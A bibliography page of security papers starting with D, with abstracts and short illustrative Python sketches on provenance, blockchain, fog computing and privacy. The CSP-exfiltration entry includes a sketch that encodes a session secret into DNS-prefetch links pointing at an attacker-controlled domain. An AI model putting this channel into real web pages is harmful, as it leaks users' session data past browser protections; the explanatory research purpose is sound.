Biblio

Found 932 results

Filters: First Letter Of Title is D
D
Thuraisingham, B., Kantarcioglu, M., Hamlen, K., Khan, L., Finin, T., Joshi, A., Oates, T., Bertino, E..  2016.  A Data Driven Approach for the Science of Cyber Security: Challenges and Directions. 2016 IEEE 17th International Conference on Information Reuse and Integration (IRI). :1–10.

This paper describes a data driven approach to studying the science of cyber security (SoS). It argues that science is driven by data. It then describes issues and approaches towards the following three aspects: (i) Data Driven Science for Attack Detection and Mitigation, (ii) Foundations for Data Trustworthiness and Policy-based Sharing, and (iii) A Risk-based Approach to Security Metrics. We believe that the three aspects addressed in this paper will form the basis for studying the Science of Cyber Security.

Jeyakumar, Vimalkumar, Madani, Omid, ParandehGheibi, Ali, Yadav, Navindra.  2016.  Data Driven Data Center Network Security. Proceedings of the 2016 ACM on International Workshop on Security And Privacy Analytics. :48–48.

Large-scale datacenters are becoming the compute and data platform of large enterprises, but their scale makes it difficult to secure the applications running within them. We motivate this setting using a complex real-world scenario and propose a data-driven approach to taming this complexity. We discuss several machine learning problems that arise, in particular focusing on inducing so-called whitelist communication policies from observing masses of communications among networked computing nodes. Briefly, a whitelist policy specifies which machines, or groups of machines, can talk to which. We present some of the challenges and opportunities, such as noisy and incomplete data, non-stationarity, lack of supervision, and challenges of evaluation, and describe some of the approaches we have found promising.
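
The policy-induction step can be pictured with a small sketch (a hypothetical simplification, not the authors' system): observed flows between labelled node groups are aggregated into group-to-group rules, and any communication outside those rules is treated as a policy violation.

```python
def induce_whitelist(flows, group_of):
    """Aggregate observed (src, dst) flows into group-to-group whitelist rules."""
    return {(group_of[src], group_of[dst]) for src, dst in flows}

def violates(flow, rules, group_of):
    """A flow violates the policy if its group pair was never observed."""
    src, dst = flow
    return (group_of[src], group_of[dst]) not in rules

# Toy data; the grouping labels are assumptions, not from the paper.
group_of = {"web1": "web", "web2": "web", "db1": "db", "mon1": "monitoring"}
observed = [("web1", "db1"), ("web2", "db1"), ("mon1", "web1")]
rules = induce_whitelist(observed, group_of)
print(violates(("web1", "mon1"), rules, group_of))  # True: never observed, so not whitelisted
```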

Oertel, Catharine, Gustafson, Joakim, Black, Alan W..  2016.  On Data Driven Parametric Backchannel Synthesis for Expressing Attentiveness in Conversational Agents. Proceedings of the Workshop on Multimodal Analyses Enabling Artificial Agents in Human-Machine Interaction. :43–47.

In this study, we use a multi-party recording as a template for building a parametric speech synthesiser that is able to express different levels of attentiveness in backchannel tokens. This allowed us to investigate i) whether it is possible to express the same perceived level of attentiveness in synthesised backchannels as in natural ones; ii) whether it is possible to increase and decrease the perceived level of attentiveness of backchannels beyond the range observed in the original corpus.

Bessa, Ricardo J., Rua, David, Abreu, Cláudia, Machado, Paulo, Andrade, José R., Pinto, Rui, Gonçalves, Carla, Reis, Marisa.  2018.  Data Economy for Prosumers in a Smart Grid Ecosystem. Proceedings of the Ninth International Conference on Future Energy Systems. :622–630.

Smart grid technologies are enablers of new business models for domestic consumers with local flexibility (generation, loads, storage), where access to data is a key requirement in the value stream. However, legislation on personal data privacy and protection imposes the need to develop local models for flexibility modeling and forecasting and to exchange models instead of personal data. This paper describes the functional architecture of a home energy management system (HEMS) and its optimization functions. A set of data-driven models, embedded in the HEMS, are discussed for improving renewable energy forecasting skill and modeling the multi-period flexibility of distributed energy resources.

Van Acker, Steven, Hausknecht, Daniel, Sabelfeld, Andrei.  2016.  Data Exfiltration in the Face of CSP. Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. :853–864.

Cross-site scripting (XSS) attacks keep plaguing the Web. Supported by most modern browsers, Content Security Policy (CSP) directs the browser to restrict the features and communication capabilities of code on a web page, mitigating the effects of XSS.

This paper puts a spotlight on the problem of data exfiltration in the face of CSP. We bring attention to the unsettling discord in the security community about the very goals of CSP when it comes to preventing data leaks.

As a consequence of this discord, we report on insecurities in the known protection mechanisms that are based on assumptions about CSP that turn out not to hold in practice.

To illustrate the practical impact of the discord, we perform a systematic case study of data exfiltration via DNS prefetching and resource prefetching in the face of CSP.

Our study of the popular browsers demonstrates that it is often possible to exfiltrate data by both resource prefetching and DNS prefetching in the face of CSP. Further, we perform a crawl of the top 10,000 Alexa domains to report on the cohabitance of CSP and prefetching in practice. Finally, we discuss directions to control data exfiltration and, for the case study, propose measures ranging from immediate fixes for the clients to prefetching-aware extensions of CSP.
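
As a rough illustration of the channel studied in this case (not the authors' experiments), the sketch below shows how exfiltrated data could be encoded into subdomain labels and wrapped in DNS-prefetch hints, so the resolver leaks the data to an attacker-controlled name server even when CSP blocks ordinary outbound requests; the domain and label length are illustrative assumptions.

```python
import base64

ATTACKER_DOMAIN = "attacker.example"  # hypothetical attacker-controlled zone

def to_prefetch_links(secret: bytes, label_len: int = 60):
    """Encode a secret into DNS-safe labels and wrap them in dns-prefetch hints."""
    encoded = base64.b32encode(secret).decode().rstrip("=").lower()
    chunks = [encoded[i:i + label_len] for i in range(0, len(encoded), label_len)]
    return [f'<link rel="dns-prefetch" href="//{i}.{c}.{ATTACKER_DOMAIN}">'
            for i, c in enumerate(chunks)]

for link in to_prefetch_links(b"session=deadbeef"):
    print(link)  # each lookup of this hostname carries a chunk of the secret
```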

Chatterjee, Tanusree, Ruj, Sushmita, DasBit, Sipra.  2018.  Data forwarding and update propagation in grid network for NDN: A low-overhead approach. 2018 IEEE International Conference on Advanced Networks and Telecommunications Systems (ANTS). :1–6.
Nowadays the Internet has become mostly content-centric. Named Data Networking (NDN) has emerged as a promising candidate to cope with how today's Internet is used. Several NDN routing features, such as in-network caching and easier data forwarding, bring potential advantages over conventional networks. Despite these advantages, many challenges in NDN are yet to be addressed. In this paper, we address two such challenges in NDN routing: (1) the huge storage overhead in NDN routers and (2) the high communication overhead in the network during propagation of routing information updates. We propose changes to existing NDN routing with the aim of providing a low-overhead solution to these problems. Instead of storing the Link State Database (LSDB) in all the routers, it is kept in selected special nodes only. The use of special nodes lowers the overall storage and update overheads. We also provide supporting algorithms for data forwarding and update propagation in a grid network. The performance of the proposed method is evaluated in terms of storage and communication overheads. The results show that the overheads are reduced by almost one third compared to the existing routing method in NDN.
Khobragade, P.K., Malik, L.G..  2014.  Data Generation and Analysis for Digital Forensic Application Using Data Mining. Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on. :458-462.

Cyber crime produces huge amounts of log and transactional data, which leads to a great deal of data to store and analyze, and it is difficult for forensic investigators to spend so much time finding clues and analyzing those data. Network forensic analysis involves network traces and the detection of attacks. The traces include Intrusion Detection System and firewall logs, logs generated by network services and applications, and packet captures by sniffers. Because a large amount of data is generated by every event on the network, it is difficult for forensic investigators to find clues and analyze those data. Network forensics deals with the monitoring, capturing, recording, and analysis of network traffic for detecting intrusions and investigating them. This paper focuses on data collection from the cyber system and the web browser. FTK 4.0 is discussed for memory forensic analysis and remote system forensics, to be used as evidence for aiding investigation.
 

Luo, Chu, Fylakis, Angelos, Partala, Juha, Klakegg, Simon, Goncalves, Jorge, Liang, Kaitai, Seppänen, Tapio, Kostakos, Vassilis.  2016.  A Data Hiding Approach for Sensitive Smartphone Data. Proceedings of the 2016 ACM International Joint Conference on Pervasive and Ubiquitous Computing. :557–568.

We develop and evaluate a data hiding method that enables smartphones to encrypt and embed sensitive information into carrier streams of sensor data. Our evaluation considers multiple handsets and a variety of data types, and we demonstrate that our method has a computational cost that allows real-time data hiding on smartphones with negligible distortion of the carrier stream. These characteristics make it suitable for smartphone applications involving privacy-sensitive data such as medical monitoring systems and digital forensics tools.
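
A minimal sketch of the embedding half of the idea is shown below: payload bits (which would be ciphertext in the real method) are hidden in the least-significant bits of integer sensor samples. This is a generic LSB illustration under assumed sample formats, not the authors' scheme.

```python
def embed(carrier, payload: bytes):
    """Hide payload bits in the LSBs of integer sensor samples (enough samples assumed)."""
    bits = [(byte >> i) & 1 for byte in payload for i in range(8)]
    out = list(carrier)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & ~1) | bit
    return out

def extract(carrier, nbytes: int):
    """Read the LSBs back and reassemble the payload bytes."""
    bits = [s & 1 for s in carrier[:nbytes * 8]]
    return bytes(sum(b << i for i, b in enumerate(bits[k * 8:(k + 1) * 8]))
                 for k in range(nbytes))

samples = list(range(1000, 1064))   # stand-in accelerometer readings
stego = embed(samples, b"secret")   # the payload would be ciphertext in practice
print(extract(stego, 6))            # b'secret'
```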

Kaji, Shugo, Kinugawa, Masahiro, Fujimoto, Daisuke, Hayashi, Yu-ichi.  2019.  Data Injection Attack Against Electronic Devices With Locally Weakened Immunity Using a Hardware Trojan. IEEE Transactions on Electromagnetic Compatibility. 61:1115—1121.
Intentional electromagnetic interference (IEMI) with information and communication devices relies on high-power electromagnetic environments far exceeding the devices' immunity to electromagnetic interference. IEMI dramatically alters the electromagnetic environment throughout the device by interfering with the electromagnetic waves inside the device and destroying low-tolerance integrated circuits (ICs) and other elements, thereby reducing the availability of the device. In contrast, this study uses a hardware Trojan (HT), which can be mounted quickly given physical access to a device, to locally weaken the device's immunity; irradiating electromagnetic waves of a specific frequency then intentionally and electromagnetically alters only the attack targets. On this basis, we propose a method that uses these electromagnetic changes to rewrite or generate data and commands handled within devices. Specifically, targeting serial communication systems used inside and outside the devices, the installation of an HT on the communication channel weakens local immunity. We show that it is possible to generate an electrical signal representing arbitrary data on the communication channel by applying electromagnetic waves of sufficiently small output compared with conventional IEMI and letting the IC process the data. In addition, we explore methods for countering such attacks.
Tajer, A..  2017.  Data Injection Attacks in Electricity Markets: Stochastic Robustness. 2017 IEEE Global Conference on Signal and Information Processing (GlobalSIP). :1095–1099.

Deregulated electricity markets rely on a two-settlement system consisting of day-ahead and real-time markets, across which electricity price is volatile. In such markets, locational marginal pricing is widely adopted to set electricity prices and manage transmission congestion. Locational marginal prices are vulnerable to measurement errors. Existing studies show that if the adversaries are omniscient, they can design profitable attack strategies without being detected by the residue-based bad data detectors. This paper focuses on a more realistic setting, in which the attackers have only partial and imperfect information due to their limited resources and restricted physical access to the grid. Specifically, the attackers are assumed to have uncertainties about the state of the grid, and the uncertainties are modeled stochastically. Based on this model, this paper offers a framework for characterizing the optimal stochastic guarantees for the effectiveness of the attacks and the associated pricing impacts.

S. Petcy Carolin, M. Somasundaram.  2016.  Data loss protection and data security using agents for cloud environment.

Cyber infrastructures are highly vulnerable to intrusions and other threats. The main challenges in cloud computing are the failure of data centres, the recovery of lost data, and the provision of a data security system. This paper proposes a Virtualization and Data Recovery scheme that creates a virtual environment, recovers lost data from data servers, and uses agents to provide data security in a cloud environment. A Cloud Manager is used to manage the virtualization and to handle faults. An erasure-code algorithm is used to recover the data: the data is first separated into n parts, which are then encrypted and stored in data servers. Semi-trusted third parties and malware-induced changes to data stored in data centres can be identified by artificial intelligence methods using agents. The Java Agent Development Framework (JADE) is used to develop agents, facilitate communication between them, and provide the computing services in the system. The framework is designed and implemented in Java as a gateway or firewall to recover from data loss.
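
A toy sketch of the separate-encrypt-store step is given below; it uses a single XOR parity part so that any one lost part can be rebuilt, whereas the paper's erasure-code algorithm and JADE agents are more general. The Fernet cipher from the third-party `cryptography` package stands in for whatever encryption the system actually uses.

```python
from functools import reduce
from cryptography.fernet import Fernet  # stand-in cipher; the paper's choice is unspecified

def split_with_parity(data: bytes, n: int):
    """Pad and split data into n equal parts plus one XOR parity part."""
    size = -(-len(data) // n)                       # ceiling division
    data = data.ljust(n * size, b"\0")
    parts = [data[i * size:(i + 1) * size] for i in range(n)]
    parity = bytes(reduce(lambda a, b: a ^ b, col) for col in zip(*parts))
    return parts + [parity]

def rebuild_missing(parts, missing_index):
    """Recover a single missing part by XOR-ing the survivors with the parity."""
    survivors = [p for i, p in enumerate(parts) if i != missing_index and p is not None]
    return bytes(reduce(lambda a, b: a ^ b, col) for col in zip(*survivors))

key = Fernet.generate_key()
cipher = Fernet(key)
pieces = split_with_parity(b"cloud record to protect", n=4)
stored = [cipher.encrypt(p) for p in pieces]        # one ciphertext per data server

recovered = [cipher.decrypt(c) for c in stored]
recovered[2] = None                                  # simulate a failed data server
print(rebuild_missing(recovered, 2))                 # prints the reconstructed third part
```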
 

Jung, M. Y., Jang, J. W..  2017.  Data management and searching system and method to provide increased security for IoT platform. 2017 International Conference on Information and Communication Technology Convergence (ICTC). :873–878.

Existing data management and searching systems for the Internet of Things use a centralized database. For this reason, such server-based systems exhibit security vulnerabilities such as IP spoofing, a single point of failure, and Sybil attacks. This paper proposes a data management system based on blockchain, which ensures security by using ECDSA digital signatures and the SHA-256 hash function. The location, indicated as the IP address of the data owner, and the data name are transcribed in a block that is included in the blockchain. Furthermore, we devise a data management and searching method based on analyzing the block hash value. By using security properties of blockchain such as authentication, non-repudiation, and data integrity, this system has a security advantage over previous data management and searching systems that use a centralized database or P2P networks.
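
The block contents described here (owner IP address and data name, hashed with SHA-256 and signed with ECDSA) might look roughly like the sketch below; the field layout and the use of the third-party `ecdsa` package are assumptions for illustration, not the paper's exact format.

```python
import hashlib, json, time
from ecdsa import SigningKey, NIST256p  # assumed ECDSA library choice

def make_block(prev_hash: str, owner_ip: str, data_name: str, signing_key: SigningKey):
    """Build a block recording which owner holds which data item, hash-chained and signed."""
    header = {
        "prev_hash": prev_hash,
        "owner_ip": owner_ip,        # location of the data owner, as in the paper
        "data_name": data_name,
        "timestamp": time.time(),
    }
    payload = json.dumps(header, sort_keys=True).encode()
    header["hash"] = hashlib.sha256(payload).hexdigest()
    header["signature"] = signing_key.sign(payload).hex()
    return header

sk = SigningKey.generate(curve=NIST256p)
block = make_block("0" * 64, "192.0.2.10", "sensor/temperature/livingroom", sk)
print(block["hash"])   # searching could filter blocks by inspecting such hashes
```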

Wu, Hanqing, Cao, Jiannong, Yang, Yanni, Tung, Cheung Leong, Jiang, Shan, Tang, Bin, Liu, Yang, Wang, Xiaoqing, Deng, Yuming.  2019.  Data Management in Supply Chain Using Blockchain: Challenges and a Case Study. 2019 28th International Conference on Computer Communication and Networks (ICCCN). :1–8.

Supply chain management (SCM) is fundamental for gaining financial, environmental and social benefits in the supply chain industry. However, traditional SCM mechanisms usually suffer from a wide scope of issues such as lack of information sharing, long delays for data retrieval, and unreliability in product tracing. Recent advances in blockchain technology show great potential to tackle these issues due to its salient features including immutability, transparency, and decentralization. Although there are some proof-of-concept studies and surveys on blockchain-based SCM from the perspective of logistics, the underlying technical challenges are not clearly identified. In this paper, we provide a comprehensive analysis of potential opportunities, new requirements, and principles of designing blockchain-based SCM systems. We summarize and discuss four crucial technical challenges in terms of scalability, throughput, access control, data retrieval and review the promising solutions. Finally, a case study of designing blockchain-based food traceability system is reported to provide more insights on how to tackle these technical challenges in practice.

Chertchom, Prajak, Tanimoto, Shigeaki, Konosu, Tsutomu, Iwashita, Motoi, Kobayashi, Toru, Sato, Hiroyuki, Kanai, Atsushi.  2019.  Data Management Portfolio for Improvement of Privacy in Fog-to-cloud Computing Systems. 2019 8th International Congress on Advanced Applied Informatics (IIAI-AAI). :884–889.
With the challenge of the vast amount of data generated by devices at the edge of networks, new architectures need a well-established data service model that accounts for privacy concerns. This paper presents an architecture for data transmission and a data portfolio with privacy for fog-to-cloud (DPPforF2C). We propose a practical data model with privacy from a digitalized information perspective at fog nodes. In addition, we propose an architecture for implementing the privacy of DPPforF2C in fog computing. Technically, we design a data portfolio based on the Message Queuing Telemetry Transport (MQTT) and the Advanced Message Queuing Protocol (AMQP). We aim to propose sample data models with a privacy architecture because there are some differences in the data obtained from IoT devices and sensors. Thus, we propose an architecture with the privacy of DPPforF2C for publishing data from edge devices to fog and to cloud servers that could be applied to fog architectures in the future.
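
As a rough sketch of what such a data portfolio might carry (the field names are illustrative assumptions, not the DPPforF2C schema), a fog node could wrap each reading in a record with explicit privacy metadata before publishing it over MQTT or AMQP:

```python
import json
from dataclasses import dataclass, asdict

@dataclass
class PortfolioItem:
    device_id: str
    reading: float
    unit: str
    privacy_level: str     # e.g. "public", "fog-only", "cloud-allowed"
    anonymize: bool        # drop identifiers before forwarding to the cloud

def to_cloud_payload(item: PortfolioItem) -> str:
    """Serialize for the cloud hop, stripping identifiers when anonymization is required."""
    record = asdict(item)
    if item.anonymize:
        record.pop("device_id")
    return json.dumps(record)

item = PortfolioItem("thermo-42", 21.5, "C", privacy_level="cloud-allowed", anonymize=True)
print(to_cloud_payload(item))   # the MQTT/AMQP publish step itself is omitted here
```
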
Kim, Bo Youn, Choi, Seong Seok, Jang, Ju Wook.  2018.  Data Managing and Service Exchanging on IoT Service Platform Based on Blockchain with Smart Contract and Spatial Data Processing. Proceedings of the 2018 International Conference on Information Science and System. :59–63.

Expectations for cryptocurrencies have risen rapidly, and all of these cryptocurrencies are generated on blockchain platforms. This means not only that the paradigm is changing in the field of finance but also that the blockchain platform is technically stable. Based on the stability of blockchain, many kinds of cryptocurrencies and application platforms are being implemented or released, and world-famous banks are applying blockchain to their financial services [1]. Even legislation for exchanging cryptocurrencies is being discussed. Furthermore, blockchain platforms also run programmed source code, called a smart contract, on their distributed platform. Smart contracts extend the usage of blockchain platforms. In this paper, we propose an algorithm for recording and managing the location data of IoT service providers and users based on blockchain with smart contracts. Our proposal records participants' data in the network on the blockchain, which ensures security, and matches them with the most suitable participant by spatial data processing.
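
A hedged sketch of the matching step is shown below: participants' recorded locations are appended to a ledger stand-in and a user is paired with the nearest registered provider by great-circle distance. This only illustrates the record-and-match idea; the authors' smart contract and spatial processing are not reproduced here.

```python
import math

ledger = []   # stand-in for blockchain records written by a smart contract

def record_location(participant_id: str, role: str, lat: float, lon: float):
    ledger.append({"id": participant_id, "role": role, "lat": lat, "lon": lon})

def haversine_km(a, b):
    """Great-circle distance between two (lat, lon) points in kilometres."""
    lat1, lon1, lat2, lon2 = map(math.radians, (a[0], a[1], b[0], b[1]))
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * 6371 * math.asin(math.sqrt(h))

def match_nearest_provider(user_id: str):
    """Pair a user with the closest recorded service provider."""
    user = next(r for r in ledger if r["id"] == user_id)
    providers = [r for r in ledger if r["role"] == "provider"]
    return min(providers,
               key=lambda p: haversine_km((user["lat"], user["lon"]), (p["lat"], p["lon"])))

record_location("provider-A", "provider", 37.55, 126.97)
record_location("provider-B", "provider", 37.60, 127.05)
record_location("user-1", "user", 37.56, 126.99)
print(match_nearest_provider("user-1")["id"])   # provider-A
```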

Haoliang Lou, Yunlong Ma, Feng Zhang, Min Liu, Weiming Shen.  2014.  Data mining for privacy preserving association rules based on improved MASK algorithm. Computer Supported Cooperative Work in Design (CSCWD), Proceedings of the 2014 IEEE 18th International Conference on. :265-270.

With the arrival of the big data era, information privacy and security issues become even more crucial. The Mining Associations with Secrecy Konstraints (MASK) algorithm and its improved versions were proposed as data mining approaches for privacy-preserving association rules. The MASK algorithm only adopts a data perturbation strategy, which leads to a low privacy-preserving degree. Moreover, it is difficult to apply the MASK algorithm in practice because of its long execution time. This paper proposes a new algorithm based on data perturbation and query restriction (DPQR) to improve the privacy-preserving degree through multi-parameter perturbation. In order to improve time-efficiency, the calculation of the inverse matrix is simplified by dividing the matrix into blocks; meanwhile, a further optimization is provided to reduce the number of database scans using set theory. Both theoretical analyses and experimental results prove that the proposed DPQR algorithm has better performance.
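
The MASK-style perturbation underlying this line of work can be sketched as randomized response: each presence bit is kept with probability p and flipped otherwise, and the true support is estimated by inverting the resulting 2x2 distortion. The sketch below is a single-parameter simplification, not the multi-parameter DPQR scheme.

```python
import random

def perturb(bits, p=0.7):
    """Keep each presence bit with probability p, flip it otherwise (MASK-style)."""
    return [b if random.random() < p else 1 - b for b in bits]

def estimate_support(perturbed_bits, p=0.7):
    """Invert the 2x2 distortion: E[observed] = p*s + (1-p)*(1-s), solve for s."""
    observed = sum(perturbed_bits) / len(perturbed_bits)
    return (observed - (1 - p)) / (2 * p - 1)

random.seed(0)
true_bits = [1] * 3000 + [0] * 7000        # item truly present in 30% of transactions
noisy = perturb(true_bits)
print(round(estimate_support(noisy), 3))   # close to 0.30
```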
 


Benjamin, B., Coffman, J., Esiely-Barrera, H., Farr, K., Fichter, D., Genin, D., Glendenning, L., Hamilton, P., Harshavardhana, S., Hom, R. et al..  2017.  Data Protection in OpenStack. 2017 IEEE 10th International Conference on Cloud Computing (CLOUD). :560–567.

As cloud computing becomes increasingly pervasive, it is critical for cloud providers to support basic security controls. Although major cloud providers tout such features, relatively little is known in many cases about their design and implementation. In this paper, we describe several security features in OpenStack, a widely-used, open source cloud computing platform. Our contributions to OpenStack range from key management and storage encryption to guaranteeing the integrity of virtual machine (VM) images prior to boot. We describe the design and implementation of these features in detail and provide a security analysis that enumerates the threats that each mitigates. Our performance evaluation shows that these security features have an acceptable cost, in some cases within the measurement error observed in an operational cloud deployment. Finally, we highlight lessons learned from our real-world development experiences from contributing these features to OpenStack as a way to encourage others to transition their research into practice.
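
One of the features mentioned, guaranteeing image integrity prior to boot, reduces at its core to comparing a freshly computed digest against a trusted reference before the image is used; the sketch below shows that check generically and is not OpenStack's actual implementation.

```python
import hashlib

def image_digest(path: str, algo: str = "sha256") -> str:
    """Hash a VM image file in chunks so large images need not fit in memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_before_boot(path: str, expected_digest: str) -> bool:
    """Refuse to boot the image if its digest does not match the trusted value."""
    return image_digest(path) == expected_digest

# Usage (path and digest are placeholders):
# ok = verify_before_boot("/var/lib/images/guest.qcow2", trusted_digest_from_catalog)
```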

Dang, T. D., Hoang, D..  2017.  A data protection model for fog computing. 2017 Second International Conference on Fog and Mobile Edge Computing (FMEC). :32–38.

Cloud computing has established itself as an alternative IT infrastructure and service model. However, as with all logically centralized resource and service provisioning infrastructures, the cloud does not handle well local issues involving a large number of networked elements (IoTs) and is not responsive enough for many applications that require the immediate attention of a local controller. Fog computing preserves many benefits of cloud computing and is also in a good position to address these local and performance issues because its resources and specific services are virtualized and located at the edge of the customer premises. However, data security is a critical challenge in fog computing, especially when fog nodes and their data move frequently in the environment. This paper addresses the data protection and performance issues by 1) proposing a Region-Based Trust-Aware (RBTA) model for trust translation among fog nodes of regions, 2) introducing a Fog-based Privacy-aware Role Based Access Control (FPRBAC) for access control at fog nodes, and 3) developing a mobility management service to handle changes in the locations of users and fog devices. The implementation results demonstrate the feasibility and efficiency of our proposed framework.
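
A very small sketch of how a fog node might combine role and region in an access decision is given below; the rule structure and trusted-region set are assumptions for illustration, since the paper's RBTA and FPRBAC models carry more state (trust translation, mobility).

```python
# Each rule: (role, region, resource) -> allowed actions. Illustrative only.
policy = {
    ("nurse", "region-1", "vitals"): {"read"},
    ("doctor", "region-1", "vitals"): {"read", "write"},
}

def allowed(role: str, region: str, resource: str, action: str,
            trusted_regions=frozenset({"region-1"})) -> bool:
    """Permit an action only if the requesting region is trusted and the role grants it."""
    if region not in trusted_regions:          # trust translation would extend this set
        return False
    return action in policy.get((role, region, resource), set())

print(allowed("nurse", "region-1", "vitals", "read"))    # True
print(allowed("nurse", "region-2", "vitals", "read"))    # False: untrusted region
```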

Patil, A., Jha, A., Mulla, M. M., Narayan, D. G., Kengond, S..  2020.  Data Provenance Assurance for Cloud Storage Using Blockchain. 2020 International Conference on Advances in Computing, Communication Materials (ICACCM). :443—448.

Cloud forensics investigates crimes committed over cloud infrastructures, such as SLA violations and storage privacy. Cloud storage forensics is the process of recording the history of the creation and operations performed on a cloud data object and investigating it. Secure data provenance in the cloud is crucial for data accountability, forensics, and privacy. Towards this, we present a cloud-based data provenance framework using blockchain, which traces data record operations and generates provenance data. Initially, we design a Dropbox-like application using AWS S3 storage. The application provides cloud storage for the students and faculty of the university, thereby making the storage and sharing of work and resources efficient. Later, we design a data provenance mechanism for confidential files of users using the Ethereum blockchain. We also evaluate the proposed system using performance parameters such as query and transaction latency by varying the load and the number of nodes of the blockchain network.
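
The provenance records themselves can be pictured as hash-chained entries, one per storage operation, so that tampering with an earlier record becomes detectable; the plain-Python sketch below shows that idea only, while the actual system anchors such records on Ethereum in front of AWS S3 storage.

```python
import hashlib, json, time

def _digest(body: dict) -> str:
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()

def provenance_entry(prev_hash: str, user: str, operation: str, object_key: str) -> dict:
    """One provenance record per storage operation, chained to its predecessor."""
    body = {"prev": prev_hash, "user": user, "op": operation,
            "object": object_key, "ts": time.time()}
    return {**body, "hash": _digest(body)}

def chain_is_intact(chain) -> bool:
    """Each record's hash must recompute correctly and match the next record's prev field."""
    for i, entry in enumerate(chain):
        body = {k: v for k, v in entry.items() if k != "hash"}
        if entry["hash"] != _digest(body):
            return False
        if i > 0 and entry["prev"] != chain[i - 1]["hash"]:
            return False
    return True

chain = [provenance_entry("0" * 64, "alice", "upload", "reports/week1.pdf")]
chain.append(provenance_entry(chain[-1]["hash"], "bob", "download", "reports/week1.pdf"))
print(chain_is_intact(chain))   # True; anchoring the latest hash on-chain protects the tail
```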

Kim, Sejin, Oh, Jisun, Kim, Yoonhee.  2019.  Data Provenance for Experiment Management of Scientific Applications on GPU. 2019 20th Asia-Pacific Network Operations and Management Symposium (APNOMS). :1–4.
Graphics Processing Units (GPUs) are becoming popular for multi-purpose applications in order to exploit highly parallel computation. As memory virtualization methods in GPU nodes are not provided efficiently enough to deal with the diverse memory usage patterns of these applications, the success of their execution depends on exclusive and limited use of physical memory in GPU environments. Therefore, it is important to predict changes in the pattern of GPU memory usage during the runtime execution of an application. Data provenance, extracted from application characteristics, GPU runtime environments, inputs, and execution patterns obtained from runtime monitoring, is defined to support application management in setting runtime configurations, predicting experimental results, and utilizing resources alongside co-located applications. In this paper, we define the data provenance of an application on GPUs and manage data by profiling the execution of CUDA scientific applications. Data provenance management helps to predict the execution patterns of other, similar experiments and to plan efficient resource configurations.
Davis, D. B., Featherston, J., Fukuda, M., Asuncion, H. U..  2017.  Data Provenance for Multi-Agent Models. 2017 IEEE 13th International Conference on e-Science (e-Science). :39–48.

Multi-agent simulations are useful for exploring collective patterns of individual behavior in social, biological, economic, network, and physical systems. However, there is no provenance support for multi-agent models (MAMs) in a distributed setting. To this end, we introduce ProvMASS, a novel approach to capture provenance of MAMs in a distributed memory by combining inter-process identification, lightweight coordination of in-memory provenance storage, and adaptive provenance capture. ProvMASS is built on top of the Multi-Agent Spatial Simulation (MASS) library, a framework that combines multi-agent systems with large-scale fine-grained agent-based models, or MAMs. Unlike other environments supporting MAMs, MASS parallelizes simulations with distributed memory, where agents and spatial data are shared application resources. We evaluate our approach with provenance queries to support three use cases and performance measures. Initial results indicate that our approach can support various provenance queries for MAMs at reasonable performance overhead.

Yazici, I. M., Karabulut, E., Aktas, M. S..  2018.  A Data Provenance Visualization Approach. 2018 14th International Conference on Semantics, Knowledge and Grids (SKG). :84–91.
In recent years, data provenance has created an emerging requirement for technologies that enable end users to access, evaluate, and act on the provenance of data. In the era of Big Data, the amount of data created by corporations around the world has grown each year. As an example, in both the social media and e-Science domains, data is growing at an unprecedented rate. As the data has grown rapidly, information on the origin and lifecycle of the data has also grown. In turn, this requires technologies that enable the clarification and interpretation of data through the use of data provenance. This study proposes methodologies for the visualization of provenance data compatible with the W3C PROV-O specification. The visualizations are done by summarization and comparison of the data provenance. We facilitated the testing of these methodologies by providing a prototype that extends an existing open-source visualization tool. We discuss the usability of the proposed methodologies with an experimental study; our initial results show that the proposed approach is usable and its processing overhead is negligible.
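
Summarizing provenance before visualizing it can be as simple as counting nodes per PROV type and edges per relation; the sketch below does this over a small hand-made, PROV-JSON-like dictionary and illustrates the summarization idea only, not the tool's code.

```python
from collections import Counter

# Minimal hand-made PROV-JSON-like document (not from the paper's datasets).
prov_doc = {
    "entity":   {"ex:raw", "ex:cleaned", "ex:chart"},
    "activity": {"ex:cleaning", "ex:plotting"},
    "agent":    {"ex:analyst"},
    "wasGeneratedBy": [("ex:cleaned", "ex:cleaning"), ("ex:chart", "ex:plotting")],
    "used":           [("ex:cleaning", "ex:raw"), ("ex:plotting", "ex:cleaned")],
    "wasAssociatedWith": [("ex:cleaning", "ex:analyst")],
}

def summarize(doc):
    """Count nodes per PROV type and edges per relation, for quick comparison of documents."""
    node_types = {"entity", "activity", "agent"}
    nodes = Counter({t: len(doc.get(t, ())) for t in node_types})
    edges = Counter({rel: len(v) for rel, v in doc.items() if rel not in node_types})
    return nodes, edges

nodes, edges = summarize(prov_doc)
print(nodes)   # Counter({'entity': 3, 'activity': 2, 'agent': 1})
print(edges)   # edge counts per relation, e.g. 'used': 2
```
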
Sillaber, Christian, Sauerwein, Clemens, Mussmann, Andrea, Breu, Ruth.  2016.  Data Quality Challenges and Future Research Directions in Threat Intelligence Sharing Practice. Proceedings of the 2016 ACM on Workshop on Information Sharing and Collaborative Security. :65–70.

In the last couple of years, organizations have demonstrated an increased willingness to participate in threat intelligence sharing platforms. The open exchange of information and knowledge regarding threats, vulnerabilities, incidents and mitigation strategies results from the organizations' growing need to protect against today's sophisticated cyber attacks. To investigate data quality challenges that might arise in threat intelligence sharing, we conducted focus group discussions with ten expert stakeholders from security operations centers of various globally operating organizations. The study addresses several factors affecting shared threat intelligence data quality at multiple levels, including collecting, processing, sharing and storing data. As expected, the study finds that the main factors that affect shared threat intelligence data stem from the limitations and complexities associated with integrating and consolidating shared threat intelligence from different sources while ensuring the data's usefulness for an inhomogeneous group of participants. Data quality is extremely important for shared threat intelligence. As our study has shown, there are no fundamentally new data quality issues in threat intelligence sharing. However, as threat intelligence sharing is an emerging domain and a large number of threat intelligence sharing tools are currently being rushed to market, several data quality issues, particularly related to scalability and data source integration, deserve particular attention.